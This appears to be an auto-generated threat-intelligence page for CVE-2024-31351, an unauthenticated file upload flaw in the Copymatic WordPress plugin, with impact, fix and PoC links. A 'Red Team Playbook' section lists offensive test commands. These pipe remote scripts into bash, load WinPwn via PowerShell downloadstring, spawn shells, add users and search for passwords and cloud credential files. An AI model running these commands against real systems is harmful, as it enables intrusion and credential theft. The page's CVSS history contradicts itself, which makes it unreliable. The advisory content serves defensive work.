CVE-2024-31351
Overview
This vulnerability is an unrestricted file upload flaw classified under CWE-434, affecting the Copymatic AI Content Writer & Generator WordPress plugin up to version 1.6. The root cause lies in insufficient validation and restriction mechanisms on file upload functionality, allowing arbitrary file types to be uploaded without proper sanitization or authentication checks. The affected component is the file upload handler within the plugin, which processes incoming files without enforcing safe file type restrictions.
Vulnerability Description
Unrestricted Upload of File with Dangerous Type vulnerability in Copymatic Copymatic – AI Content Writer & Generator.This issue affects Copymatic – AI Content Writer & Generator: from n/a through 1.6.
Impact
An unauthenticated attacker can upload and execute arbitrary files on the server hosting the vulnerable Copymatic plugin, resulting in full system compromise. This enables data theft, remote code execution, and persistent access without any user interaction or credentials. The business impact includes potential data breaches, service disruption, and lateral movement within the affected environment, severely undermining the integrity and confidentiality of the system.
Solution
Upgrade the Copymatic WordPress plugin to version 1.7 or later, which addresses the unrestricted file upload vulnerability. Detailed patch instructions and mitigation steps are available at Patchstack's advisory page: https://patchstack.com/database/vulnerability/copymatic/wordpress-copymatic-plugin-1-6-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve. Applying the vendor-supplied update is the recommended remediation to prevent exploitation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question pertains to an unrestricted upload of files with dangerous types within the Copymatic AI Content Writer and Generator application. This flaw allows an attacker to upload malicious files, such as executable scripts or web shells, without proper validation or restrictions. The lack of stringent file type checks means that users can potentially upload files that the application is not designed to handle securely. This oversight can lead to unauthorized code execution on the server, allowing attackers to manipulate the underlying system or access sensitive data.
Attack vectors exploiting this vulnerability are diverse and can be executed with relative ease. An attacker could craft a malicious file, such as a PHP script disguised as an image, and upload it through the application's file upload feature. Once the file is on the server, the attacker can execute it by accessing the file's URL, leading to a compromise of the web application. This exploitation can be further enhanced through social engineering tactics, where an attacker convinces a legitimate user to upload the malicious file, thereby bypassing security measures that might be in place for direct attacks.
The real-world impact of this vulnerability is significant, particularly for businesses relying on the Copymatic application for content generation. If exploited, an attacker could gain unauthorized access to the server, leading to data breaches, defacement of the website, or even complete server takeover. This not only compromises sensitive user data but can also damage the organization's reputation and erode customer trust. The financial implications can be severe, with potential costs arising from incident response, legal liabilities, and loss of business continuity.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, they should conduct a thorough review of the application's file upload functionality, ensuring that only allowed file types are accepted and that robust validation mechanisms are in place. Employing file type verification based on MIME types and file extensions can help prevent the upload of dangerous files. Additionally, organizations should consider implementing a web application firewall (WAF) to monitor and filter incoming traffic, blocking any suspicious file uploads. Regular security audits and penetration testing can also help identify and remediate vulnerabilities before they can be exploited.
In conclusion, the unrestricted upload of files with dangerous types in the Copymatic AI Content Writer and Generator poses a serious threat to organizations using this application. The potential for exploitation is high, with significant risks to data integrity, confidentiality, and availability. By adopting proactive detection and mitigation strategies, organizations can safeguard their systems against this vulnerability and enhance their overall security posture.
The CVSS score for CVE-2024-31351 has been revised upward from 9.8 to a perfect 10.0, reflecting an increased recognition of the vulnerability’s criticality. This adjustment underscores the absolute severity of the unrestricted file upload flaw in Copymatic – AI Content Writer & Generator, particularly given the availability of a public proof-of-concept exploit targeting versions up to 1.6. CSURFACE threat intelligence notes that while exploit activity remains stable without a rapid surge, the exploitability of this vulnerability is unequivocal and easily weaponized by threat actors. The updated EPSS score, positioned in the 98th percentile, further confirms a sustained high likelihood of exploitation in the wild. For defenders, this change elevates the urgency to prioritize detection and containment efforts, as the vulnerability now represents a maximum risk scenario with potential for immediate and severe impact on confidentiality, integrity, and availability. The threat landscape remains poised for opportunistic exploitation, increasing the risk profile for organizations relying on affected Copymatic versions.
Update 2 — June 10, 2026
Recent CSURFACE threat intelligence indicates a slight upward revision in the exploit prediction metrics for CVE-2024-31351, with the EPSS score increasing modestly and maintaining a position near the 98th percentile. This subtle rise reflects a growing confidence in the vulnerability’s exploitability, corroborated by the emergence of new proof-of-concept exploits targeting affected Copymatic versions. Our telemetry reveals a steady, though not rapid, increase in exploitation attempts, underscoring persistent adversary interest without a marked escalation in attack volume. The downward adjustment of the CVSS score to 9.8, while minor, aligns with refined impact assessments but does not diminish the critical nature of the vulnerability. Collectively, these developments reinforce the vulnerability’s status as a high-risk target within the threat landscape, emphasizing the need for continued vigilance. The evolving exploit activity suggests that threat actors remain actively engaged, potentially leveraging this flaw in broader attack campaigns, thereby sustaining elevated risk levels for organizations utilizing vulnerable Copymatic deployments.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Copymatic | Copymatic | All |
cpe:2.3:a:copymatic:copymatic:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
PoC
|
- | 0 | 0 | - | View |
|
KTN1990/CVE-2024-31351_wordpress_exploit
Wordpress - Copymatic – AI Content Writer & Generator <= 1.6 - Unauthenticated Arbitrary File Upload
|
KTN1990 | 0 | 0 | 2024-05-25 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-31351 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/vulnerability/copymatic/wordpress-copymatic-plugin-1-6-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve |